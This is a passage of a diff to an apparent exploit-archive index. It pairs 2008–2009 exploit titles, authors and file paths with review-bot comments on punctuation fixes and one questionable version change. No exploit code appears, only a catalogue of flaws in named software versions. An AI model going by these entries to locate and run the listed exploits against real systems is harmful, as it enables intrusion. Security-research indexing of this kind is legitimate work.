 6553,platforms/php/webapps/6553.txt,"PHPcounter <= 1.3.2 (defs.php l) Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0
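Review bot: The new 6550 line silently drops `#2` from `AJ Auction Pro Platinum Skin #2` rather than converting it. Elsewhere in this diff `#2` is read as an exploit sequence number and becomes `(2)` (6711, 6716, 7006), but here it sits inside the product name and there is no visible `(1)` sibling for 6550, so it may well identify the second Platinum skin variant — in which case removing it changes what the entry claims to cover. Either keep it, `"AJ Auction Pro Platinum Skin #2 - (detail.php item_id) SQL Injection Vuln"`, or, if the exploit header confirms it is a sequence number, move it to the end as `(2)`; dropping it is the one option that loses information.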
@@ -6131,7 +6131,7 @@ id,file,description,date,author,platform,type,port
 6558,platforms/php/webapps/6558.txt,"barcodegen <= 2.0.0 - Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0
 6559,platforms/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,php,webapps,0
 6560,platforms/windows/dos/6560.txt,"MS Windows Wordpad .doc File Local Denial of Service PoC",2008-09-25,securfrog,windows,dos,0
-6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum (seller_id) SQL Injection Vulnerability",2008-09-25,InjEctOr5,php,webapps,0
+6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - (seller_id) SQL Injection Vulnerability",2008-09-25,InjEctOr5,php,webapps,0
 6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 (design) Local File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0
 6563,platforms/php/webapps/6563.txt,"phpOCS <= 0.1-beta3 (index.php act) Local File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0
 6564,platforms/php/webapps/6564.txt,"Vikingboard <= 0.2 Beta (task) Local File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0
@@ -6188,7 +6188,7 @@ id,file,description,date,author,platform,type,port
 6616,platforms/windows/dos/6616.txt,"MS Windows Explorer Unspecified .ZIP File Denial of Service Exploit",2008-09-28,"fl0 fl0w",windows,dos,0
 6617,platforms/php/webapps/6617.txt,"BbZL.PhP 0.92 (lien_2) Local Directory Traversal Vulnerability",2008-09-28,JIKO,php,webapps,0
 6618,platforms/php/webapps/6618.txt,"joomla component imagebrowser <= 0.1.5 rc2 - Directory Traversal vuln",2008-09-28,Cr@zy_King,php,webapps,0
-6619,platforms/windows/dos/6619.html,"MS Internet Explorer GDI+ Proof of Concept (MS08-052)",2008-09-28,"John Smith",windows,dos,0
+6619,platforms/windows/dos/6619.html,"MS Internet Explorer GDI+ - Proof of Concept (MS08-052)",2008-09-28,"John Smith",windows,dos,0
 6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vuln",2008-09-28,boom3rang,php,webapps,0
 6621,platforms/php/webapps/6621.txt,"BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability",2008-09-28,Stack,php,webapps,0
 6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0
@@ -6277,12 +6277,12 @@ id,file,description,date,author,platform,type,port
 6708,platforms/php/webapps/6708.txt,"Gforge <= 4.6 rc1 (skill_edit) SQL Injection Vulnerability",2008-10-09,beford,php,webapps,0
 6709,platforms/php/webapps/6709.txt,"Joomla Component Joomtracker 1.01 Remote SQL injection Vulnerability",2008-10-09,rsauron,php,webapps,0
 6710,platforms/php/webapps/6710.txt,"camera life 2.6.2b4 (sql/xss) Multiple Vulnerabilities",2008-10-09,BackDoor,php,webapps,0
-6711,platforms/php/webapps/6711.htm,"Kusaba <= 1.0.4 - Remote Code Execution Exploit #2",2008-10-09,Sausage,php,webapps,0
+6711,platforms/php/webapps/6711.htm,"Kusaba <= 1.0.4 - Remote Code Execution Exploit (2)",2008-10-09,Sausage,php,webapps,0
 6712,platforms/php/webapps/6712.txt,"IranMC Arad Center (news.php id) SQL Injection Vulnerability",2008-10-09,"Hussin X",php,webapps,0
 6713,platforms/php/webapps/6713.txt,"ScriptsEz Mini Hosting Panel (members.php) LFI Vulnerability",2008-10-09,JosS,php,webapps,0
 6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 (SQL) User Credentials Disclosure Exploit",2008-10-09,gnix,php,webapps,0
 6715,platforms/php/webapps/6715.txt,"ScriptsEz Easy Image Downloader Local File Download Vulnerability",2008-10-09,JosS,php,webapps,0
-6716,platforms/windows/dos/6716.pl,"MS Windows GDI+ Proof of Concept (MS08-052) #2",2008-10-09,"John Smith",windows,dos,0
+6716,platforms/windows/dos/6716.pl,"MS Windows GDI+ - Proof of Concept (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0
 6717,platforms/windows/dos/6717.py,"WinFTP 2.3.0 (PASV mode) Remote Denial of Service Exploit",2008-10-09,dmnt,windows,dos,0
 6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 (load) Remote Crash Vulnerability",2008-10-10,"Jeremy Brown",linux,dos,0
 6719,platforms/windows/dos/6719.py,"NoticeWare E-mail Server 5.1.2.2 (POP3) Pre-Auth DoS Exploit",2008-10-10,rAWjAW,windows,dos,0
@@ -6554,7 +6554,7 @@ id,file,description,date,author,platform,type,port
 6991,platforms/php/webapps/6991.txt,"TR News <= 2.1 (login.php) Remote Login Bypass Exploit",2008-11-04,StAkeR,php,webapps,0
 6992,platforms/php/webapps/6992.txt,"wotw <= 5.0 - Local/Remote File Inclusion Vulnerability",2008-11-04,dun,php,webapps,0
 6993,platforms/php/webapps/6993.php,"Simple Machines Forum (SMF) 1.1.6 Code Execution Exploit",2008-11-04,"Charles Fol",php,webapps,0
-6994,platforms/windows/local/6994.txt,"Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit",2008-11-05,Elazar,windows,local,0
+6994,platforms/windows/local/6994.txt,"Adobe Reader - util.printf() JavaScript Function Stack Overflow Exploit",2008-11-05,Elazar,windows,local,0
 6995,platforms/php/webapps/6995.txt,"phpBB Mod Small ShoutBox 1.4 - Remote Edit/Delete Messages Vuln",2008-11-05,StAkeR,php,webapps,0
 6996,platforms/php/webapps/6996.php,"PHPX 3.5.16 (news_id) Remote SQL Injection Exploit",2008-11-05,StAkeR,php,webapps,0
 6997,platforms/php/webapps/6997.txt,"Pre Podcast Portal (Tour.php id) SQL Injection Vulnerability",2008-11-05,G4N0K,php,webapps,0
@@ -6566,7 +6566,7 @@ id,file,description,date,author,platform,type,port
 7003,platforms/php/webapps/7003.txt,"PHP Auto Listings (moreinfo.php pg) SQL Injection Vulnerability",2008-11-05,G4N0K,php,webapps,0
 7004,platforms/php/webapps/7004.txt,"Pre Simple CMS (Auth Bypass) SQL Injection Vulnerability",2008-11-05,"Hussin X",php,webapps,0
 7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO (Auth Bypass) SQL Injection Vulnerability",2008-11-05,Cyber-Zone,php,webapps,0
-7006,platforms/windows/local/7006.txt,"Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit #2",2008-11-05,"Debasis Mohanty",windows,local,0
+7006,platforms/windows/local/7006.txt,"Adobe Reader - util.printf() JavaScript Function Stack Overflow Exploit (2)",2008-11-05,"Debasis Mohanty",windows,local,0
 7007,platforms/php/webapps/7007.txt,"HarlandScripts drinks (recid) Remote SQL Injection Velnerability",2008-11-05,"Ex Tacy",php,webapps,0
 7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings (Auth Bypass) SQL Injection Vulnerability",2008-11-05,Cyber-Zone,php,webapps,0
 7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script SQL Injection Vulnerability",2008-11-05,InjEctOr5,php,webapps,0
@@ -6583,7 +6583,7 @@ id,file,description,date,author,platform,type,port
 7020,platforms/php/webapps/7020.txt,"MySQL Quick Admin 1.5.5 - Local File Inclusion Vulnerability",2008-11-06,"Vinod Sharma",php,webapps,0
 7021,platforms/php/webapps/7021.txt,"SoftComplex PHP Image Gallery 1.0 (Auth Bypass) SQL Injection Vuln",2008-11-06,Cyber-Zone,php,webapps,0
 7022,platforms/php/webapps/7022.txt,"LoveCMS 1.6.2 Final Arbitrary File Delete Vulnerability",2008-11-06,cOndemned,php,webapps,0
-7023,platforms/php/webapps/7023.txt,"DeltaScripts PHP Classifieds <= 7.5 (Auth Bypass) SQL Injection Vuln",2008-11-06,ZoRLu,php,webapps,0
+7023,platforms/php/webapps/7023.txt,"DeltaScripts PHP Classifieds <= 7.5 - (Auth Bypass) SQL Injection Vuln",2008-11-06,ZoRLu,php,webapps,0
 7024,platforms/php/webapps/7024.txt,"DeltaScripts PHP Links <= 1.3 - (Auth Bypass) SQL Injection Vulnerability",2008-11-06,ZoRLu,php,webapps,0
 7025,platforms/php/webapps/7025.txt,"DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability",2008-11-06,ZoRLu,php,webapps,0
 7026,platforms/php/webapps/7026.txt,"SoftComplex PHP Image Gallery (ctg) SQL Injection Vulnerability",2008-11-06,"Hussin X",php,webapps,0
@@ -6618,7 +6618,7 @@ id,file,description,date,author,platform,type,port
 7057,platforms/php/webapps/7057.pl,"MemHT Portal <= 4.0 - Remote Code Execution Exploit",2008-11-08,Ams,php,webapps,0
 7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 (upload/xss) Multiple Vulnerabilities",2008-11-08,ZoRLu,php,webapps,0
 7059,platforms/php/webapps/7059.txt,"Enthusiast 3.1.4 (show_joined.php path) Remote File Inclusion Vuln",2008-11-08,BugReport.IR,php,webapps,0
-7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router (xslt) Denial of Service Vulnerability",2008-11-08,hkm,hardware,dos,0
+7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router (xslt) - Denial of Service Vulnerability",2008-11-08,hkm,hardware,dos,0
 7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Auth Bypass) SQL Injection Vuln",2008-11-08,d3b4g,php,webapps,0
 7062,platforms/php/webapps/7062.txt,"ZEEJOBSITE 2.0 - Remote File Upload Vulnerability",2008-11-08,ZoRLu,php,webapps,0
 7063,platforms/php/webapps/7063.txt,"V3 Chat - Profiles/Dating Script 3.0.2 - Insecure Cookie Handling Vuln",2008-11-08,Stack,php,webapps,0
@@ -6644,7 +6644,7 @@ id,file,description,date,author,platform,type,port
 7084,platforms/php/webapps/7084.txt,"PHPStore Complete Classifieds Script File Upload Vulnerability",2008-11-10,ZoRLu,php,webapps,0
 7085,platforms/php/webapps/7085.txt,"PHPStore Real Estate Remote File Upload Vulnerability",2008-11-10,ZoRLu,php,webapps,0
 7086,platforms/php/webapps/7086.txt,"AJSquare Free Polling Script (DB) Multiple Vulnerabilities",2008-11-10,G4N0K,php,webapps,0
-7087,platforms/php/webapps/7087.txt,"AJ Auction Authentication Bypass Vulnerability",2008-11-10,G4N0K,php,webapps,0
+7087,platforms/php/webapps/7087.txt,"AJ Auction Authentication - Bypass Vulnerability",2008-11-10,G4N0K,php,webapps,0
 7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 - Multiple Buffer Overflow Vulnerabilities PoC (OSX)",2008-11-11,xwings,osx,dos,0
 7089,platforms/php/webapps/7089.txt,"Aj Classifieds Authentication Bypass Vulnerability",2008-11-11,G4N0K,php,webapps,0
 7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 (URL Protocol) Remote Unicode Buffer Overflow PoC",2008-11-11,Nine:Situations:Group,windows,dos,0
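Review bot: On the new 7087 line the ` - ` separator lands inside the phrase "Authentication Bypass", giving `AJ Auction Authentication - Bypass Vulnerability`; in the rest of this commit the separator follows the product name, so the line should read `+7087,platforms/php/webapps/7087.txt,"AJ Auction - Authentication Bypass Vulnerability",2008-11-10,G4N0K,php,webapps,0`. The same misplacement appears on 8285 (hunk @@ -7789) and 8356 (hunk @@ -7864), where `Mozilla Firefox XSL - Parsing ...` splits "XSL Parsing" and `Mozilla Firefox - XSL Parsing ...` would keep the product/title split. The untouched context line 7089 (`Aj Classifieds Authentication Bypass Vulnerability`) is the same shape as the old 7087, so if this pass is meant to normalise the index it presumably wants the same treatment.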
@@ -7076,7 +7076,7 @@ id,file,description,date,author,platform,type,port
 7533,platforms/windows/local/7533.txt,"PowerStrip < = 3.84 (pstrip.sys) Privilege Escalation Exploit",2008-12-21,"NT Internals",windows,local,0
 7534,platforms/asp/webapps/7534.txt,"Emefa Guestbook 3.0 - Remote Database Disclosure Vulnerability",2008-12-21,Cyber.Zer0,asp,webapps,0
 7535,platforms/hardware/dos/7535.php,"Linksys Wireless ADSL Router (WAG54G V.2) httpd DoS Exploit",2008-12-21,r0ut3r,hardware,dos,0
-7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit",2008-12-21,r0ut3r,windows,local,0
+7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit",2008-12-21,r0ut3r,windows,local,0
 7537,platforms/php/webapps/7537.txt,"BLOG 1.55B (image_upload.php) Arbitrary File Upload Vulnerability",2008-12-21,Piker,php,webapps,0
 7538,platforms/php/webapps/7538.txt,"Joomla Component com_hbssearch 1.0 - Blind SQL Injection Vuln",2008-12-21,boom3rang,php,webapps,0
 7539,platforms/php/webapps/7539.txt,"Joomla Component com_tophotelmodule 1.0 - Blind SQL Injection Vuln",2008-12-21,boom3rang,php,webapps,0
@@ -7087,10 +7087,10 @@ id,file,description,date,author,platform,type,port
 7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b (check_url.php url) Upload Shell/SQL Injection Exploit",2008-12-22,Ams,php,webapps,0
 7545,platforms/php/webapps/7545.txt,"yourplace <= 1.0.2 - Multiple Vulnerabilities + rce exploit",2008-12-22,Osirys,php,webapps,0
 7546,platforms/php/webapps/7546.txt,"Joomla Component Volunteer 2.0 (job_id) SQL Injection Vulnerability",2008-12-22,boom3rang,php,webapps,0
-7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit (py)",2008-12-22,"Encrypt3d.M!nd ",windows,local,0
+7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit (py)",2008-12-22,"Encrypt3d.M!nd ",windows,local,0
 7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit",2008-12-22,StAkeR,php,webapps,0
 7549,platforms/php/webapps/7549.txt,"RoundCube Webmail <= 0.2-3 beta Code Execution Vulnerability",2008-12-22,"Jacobo Gimeno",php,webapps,0
-7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 (pstopdf filter) Privilege Escalation Exploit",2008-12-22,"Jon Oberheide",multiple,local,0
+7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - (pstopdf filter) Privilege Escalation Exploit",2008-12-22,"Jon Oberheide",multiple,local,0
 7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 (Auth Bypass) SQL Injection Vulnerability",2008-12-22,StAkeR,php,webapps,0
 7552,platforms/php/webapps/7552.txt,"REDPEACH CMS (zv) Remote SQL Injection Vulnerability",2008-12-22,Lidloses_Auge,php,webapps,0
 7553,platforms/php/webapps/7553.sh,"RoundCube Webmail <= 0.2b Remote Code Execution Exploit",2008-12-22,Hunger,php,webapps,0
@@ -7186,20 +7186,20 @@ id,file,description,date,author,platform,type,port
 7646,platforms/multiple/local/7646.txt,"PHP <= 5.2.8 gd library - imageRotate() Information Leak Vulnerability",2009-01-02,"Hamid Ebadi",multiple,local,0
 7647,platforms/multiple/dos/7647.txt,"VMware <= 2.5.1 (Vmware-authd) Remote Denial of Service Exploit",2009-01-02,"laurent gaffié ",multiple,dos,0
 7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 (rfi/lfi/xss) Multiple Vulnerabilities",2009-01-02,ahmadbady,php,webapps,0
-7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 (.m3u File) Local Buffer Overflow PoC",2009-01-02,"aBo MoHaMeD",windows,dos,0
+7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 0 (.m3u File) Local Buffer Overflow PoC",2009-01-02,"aBo MoHaMeD",windows,dos,0
 7650,platforms/php/webapps/7650.php,"Lito Lite CMS Multiple Cross Site Scripting / Blind SQL Injection Exploit",2009-01-03,darkjoker,php,webapps,0
-7651,platforms/windows/local/7651.py,"Destiny Media Player 1.61 (.m3u File) Local Stack Overflow Exploit",2009-01-03,His0k4,windows,local,0
-7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 (lst File) Local Buffer overflow PoC",2009-01-03,"Encrypt3d.M!nd ",windows,dos,0
+7651,platforms/windows/local/7651.py,"Destiny Media Player 1.61 - (.m3u File) Local Stack Overflow Exploit",2009-01-03,His0k4,windows,local,0
+7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow PoC",2009-01-03,"Encrypt3d.M!nd ",windows,dos,0
 7653,platforms/php/webapps/7653.txt,"Webspell 4 (Auth Bypass) SQL Injection Vulnerability",2009-01-03,N/A,php,webapps,0
-7654,platforms/windows/local/7654.pl,"Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit",2009-01-04,"Encrypt3d.M!nd ",windows,local,0
-7655,platforms/windows/local/7655.pl,"Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #2",2009-01-04,sCORPINo,windows,local,0
-7656,platforms/windows/local/7656.pl,"Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #3",2009-01-04,Houssamix,windows,local,0
+7654,platforms/windows/local/7654.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit",2009-01-04,"Encrypt3d.M!nd ",windows,local,0
+7655,platforms/windows/local/7655.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (2)",2009-01-04,sCORPINo,windows,local,0
+7656,platforms/windows/local/7656.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (3)",2009-01-04,Houssamix,windows,local,0
 7657,platforms/php/webapps/7657.txt,"webSPELL <= 4.01.02 (id) Remote Edit Topics Vulnerability",2009-01-04,StAkeR,php,webapps,0
 7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion Exploit",2009-01-04,StAkeR,php,webapps,0
 7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 (search) Remote SQL Injection Vulnerability",2009-01-04,DaiMon,php,webapps,0
 7660,platforms/php/webapps/7660.txt,"PhpMesFilms 1.0 (index.php id) Remote SQL Injection Vulnerability",2009-01-04,SuB-ZeRo,php,webapps,0
-7661,platforms/windows/local/7661.pl,"Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #4",2009-01-04,Stack,windows,local,0
-7662,platforms/windows/local/7662.py,"Destiny Media Player 1.61 (lst File) Local Buffer Overflow Exploit #5",2009-01-04,suN8Hclf,windows,local,0
+7661,platforms/windows/local/7661.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (4)",2009-01-04,Stack,windows,local,0
+7662,platforms/windows/local/7662.py,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (5)",2009-01-04,suN8Hclf,windows,local,0
 7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 (id) Remote SQL Injection Vulnerability",2009-01-04,ZoRLu,php,webapps,0
 7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 (viewarticle.php id) Blind SQL Injection Exploit",2009-01-04,darkjoker,php,webapps,0
 7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro (acc.mdb) Database Disclosure Vulnerability",2009-01-05,ByALBAYX,asp,webapps,0
@@ -7229,7 +7229,7 @@ id,file,description,date,author,platform,type,port
 7689,platforms/php/webapps/7689.txt,"BlogHelper (common_db.inc) Remote Config File Disclosure Vulnerability",2009-01-06,ahmadbady,php,webapps,0
 7690,platforms/php/webapps/7690.txt,"PollHelper (poll.inc) Remote Config File Disclosure Vulnerability",2009-01-06,ahmadbady,php,webapps,0
 7691,platforms/php/webapps/7691.php,"Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability",2009-01-07,irk4z,php,webapps,0
-7692,platforms/windows/local/7692.pl,"CoolPlayer BUILD 219 (PlaylistSkin) Buffer Overflow Exploit",2009-01-07,"Jeremy Brown",windows,local,0
+7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - (PlaylistSkin) Buffer Overflow Exploit",2009-01-07,"Jeremy Brown",windows,local,0
 7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 (user) Remote Buffer Overflow PoC",2009-01-07,Houssamix,windows,dos,0
 7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 (.aup File) Remote off by one Crash Exploit",2009-01-07,Stack,windows,dos,0
 7695,platforms/windows/local/7695.pl,"VUPlayer <= 2.49 - (.PLS) Universal Buffer Overflow Exploit",2009-01-07,SkD,windows,local,0
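Review bot: The new 7649 line reads `Destiny Media Player 1.61 0 (.m3u File) Local Buffer Overflow PoC` — a stray ` 0` where every other Destiny Media Player entry in this hunk (7651, 7652, 7654–7656, 7661, 7662) receives ` - `, so this looks like a typo for the separator and leaves one title in the index visibly different from its siblings. It should read `+7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - (.m3u File) Local Buffer Overflow PoC",2009-01-02,"aBo MoHaMeD",windows,dos,0`.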
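Review bot: The new 7692 line replaces `CoolPlayer BUILD 219` with `CoolPlayer 2.19`, which changes the recorded version identifier rather than only its punctuation. The sibling entries 7536 and 7547 (hunks @@ -7076 and @@ -7087) already call the same-vintage CoolPlayer `2.19`, so the equivalence is plausible, but the index should only assert it once it has been checked against the exploit file's own header; otherwise keeping `CoolPlayer BUILD 219 - (PlaylistSkin) ...` preserves what the author wrote.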
@@ -7371,7 +7371,7 @@ id,file,description,date,author,platform,type,port
 7833,platforms/php/webapps/7833.php,"Joomla com_waticketsystem Blind SQL Injection Exploit",2009-01-19,InjEctOr5,php,webapps,0
 7834,platforms/php/webapps/7834.txt,"Ninja Blog 4.8 (CSRF/HTML Injection) Vulnerability",2009-01-19,"Danny Moules",php,webapps,0
 7835,platforms/php/webapps/7835.htm,"Max.Blog 1.0.6 Arbitrary Delete Post Exploit",2009-01-20,SirGod,php,webapps,0
-7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 (id) SQL Injection Vulnerability",2009-01-20,snakespc,php,webapps,0
+7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - (id) SQL Injection Vulnerability",2009-01-20,snakespc,php,webapps,0
 7837,platforms/php/webapps/7837.pl,"LinPHA Photo Gallery 2.0 - Remote Command Execution Exploit",2009-01-20,Osirys,php,webapps,0
 7838,platforms/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 (dodosquiz.php) Local File Inclusion Vulnerability",2009-01-20,Stack,php,webapps,0
 7839,platforms/windows/local/7839.py,"Total Video Player 1.31 (DefaultSkin.ini) Local Stack Overflow Exploit",2009-01-20,His0k4,windows,local,0
@@ -7613,7 +7613,7 @@ id,file,description,date,author,platform,type,port
 8087,platforms/cgi/webapps/8087.txt,"i-dreams GB Server (admin.dat) File Disclosure Vulnerability",2009-02-20,Pouya_Server,cgi,webapps,0
 8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x (admin.txt) File Disclosure Vulnerability",2009-02-20,Pouya_Server,php,webapps,0
 8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - (id) SQL Command Injection Exploit",2009-02-20,Osirys,php,webapps,0
-8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers JBIG2 Local Buffer Overflow PoC",2009-02-23,webDEViL,windows,dos,0
+8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow PoC",2009-02-23,webDEViL,windows,dos,0
 8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 (BODY onload) Remote Crash Exploit",2009-02-23,Skylined,multiple,dos,0
 8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 (admin.php) No Authentication Vulnerability",2009-02-23,ahmadbady,php,webapps,0
 8093,platforms/php/webapps/8093.pl,"pPIM 1.01 (notes.php id) Remote Command Execution Exploit",2009-02-23,JosS,php,webapps,0
@@ -7622,7 +7622,7 @@ id,file,description,date,author,platform,type,port
 8096,platforms/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router SMS XSS Attack",2009-02-23,"Rizki Wicaksono",hardware,remote,0
 8097,platforms/multiple/remote/8097.txt,"MLdonkey <= 2.9.7 HTTP DOUBLE SLASH Arbitrary File Disclosure Vuln",2009-02-23,"Michael Peselnik",multiple,remote,0
 8098,platforms/php/webapps/8098.txt,"taifajobs <= 1.0 (jobid) Remote SQL Injection Vulnerability",2009-02-23,K-159,php,webapps,0
-8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day",2009-02-23,"Guido Landi",windows,dos,0
+8099,platforms/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow PoC (2) (0day)",2009-02-23,"Guido Landi",windows,dos,0
 8100,platforms/php/webapps/8100.pl,"MDPro Module My_eGallery (pid) Remote SQL Injection Exploit",2009-02-23,StAkeR,php,webapps,0
 8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-02-24,Fireshot,php,webapps,0
 8102,platforms/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x Remote Buffer Overflow PoC",2009-02-24,M4rt1n,windows,dos,0
@@ -7741,21 +7741,21 @@ id,file,description,date,author,platform,type,port
 8229,platforms/php/webapps/8229.txt,"Wordpress Plugin fMoblog 2.1 (id) SQL Injection Vulnerability",2009-03-17,"strange kevin",php,webapps,0
 8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability",2009-03-17,Garry,php,webapps,0
 8231,platforms/windows/local/8231.php,"CDex 1.70b2 (.ogg) Local Buffer Overflow Exploit (xp/ sp3)",2009-03-18,Nine:Situations:Group,windows,local,0
-8232,platforms/windows/dos/8232.py,"Chasys Media Player 1.1 (.pls) Local Buffer Overflow PoC (SEH)",2009-03-18,zAx,windows,dos,0
-8233,platforms/windows/local/8233.py,"Chasys Media Player 1.1 (.pls) Local Stack overflow Exploit",2009-03-18,His0k4,windows,local,0
-8234,platforms/windows/local/8234.py,"Chasys Media Player 1.1 (.pls) Stack Overflow Exploit #2",2009-03-18,"Encrypt3d.M!nd ",windows,local,0
-8235,platforms/windows/local/8235.py,"Chasys Media Player 1.1 (.m3u) Stack Overflow Exploit",2009-03-18,"Encrypt3d.M!nd ",windows,local,0
+8232,platforms/windows/dos/8232.py,"Chasys Media Player 1.1 - (.pls) Local Buffer Overflow PoC (SEH)",2009-03-18,zAx,windows,dos,0
+8233,platforms/windows/local/8233.py,"Chasys Media Player 1.1 - (.pls) Local Stack overflow Exploit",2009-03-18,His0k4,windows,local,0
+8234,platforms/windows/local/8234.py,"Chasys Media Player 1.1 - (.pls) Stack Overflow Exploit (2)",2009-03-18,"Encrypt3d.M!nd ",windows,local,0
+8235,platforms/windows/local/8235.py,"Chasys Media Player 1.1 - (.m3u) Stack Overflow Exploit",2009-03-18,"Encrypt3d.M!nd ",windows,local,0
 8236,platforms/windows/local/8236.py,"Icarus 2.0 (.PGN File) Local Stack Overflow Exploit (SEH)",2009-03-18,His0k4,windows,local,0
 8237,platforms/php/webapps/8237.txt,"facil-cms 0.1rc2 Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0
 8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 (gal) Blind SQL Injection Vuln",2009-03-18,boom3rang,php,webapps,0
 8239,platforms/php/webapps/8239.txt,"Pivot 1.40.6 - Remote Arbitrary File Deletion Vulnerability",2009-03-18,"Alfons Luja",php,webapps,0
 8240,platforms/php/webapps/8240.txt,"DeluxeBB <= 1.3 (qorder) Remote SQL Injection Vulnerability",2009-03-18,girex,php,webapps,0
 8241,platforms/multiple/dos/8241.txt,"ModSecurity < 2.5.9 - Remote Denial of Service Vulnerability",2009-03-19,"Juan Galiana Lara",multiple,dos,0
-8242,platforms/windows/local/8242.rb,"Chasys Media Player 1.1 .cue File Stack Overflow Exploit",2009-03-19,Stack,windows,local,0
+8242,platforms/windows/local/8242.rb,"Chasys Media Player 1.1 - .cue File Stack Overflow Exploit",2009-03-19,Stack,windows,local,0
 8243,platforms/php/webapps/8243.txt,"bloginator 1a - (cookie bypass/sql) Multiple Vulnerabilities",2009-03-19,Fireshot,php,webapps,0
 8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Command Injection via Cookie Bypass Exploit",2009-03-19,Fireshot,php,webapps,0
 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x Remote Denial of Service Exploit",2009-03-19,"Jonathan Salwan",multiple,dos,0
-8246,platforms/windows/local/8246.pl,"Chasys Media Player (.lst playlist) Local Buffer Overflow Exploit",2009-03-19,zAx,windows,local,0
+8246,platforms/windows/local/8246.pl,"Chasys Media Player - (.lst playlist) Local Buffer Overflow Exploit",2009-03-19,zAx,windows,local,0
 8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server Command Execution Vulnerability (post auth)",2009-03-19,"Emory University",cgi,webapps,0
 8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 (From) Remote Buffer Overflow Exploit (SEH)",2009-03-20,His0k4,windows,remote,0
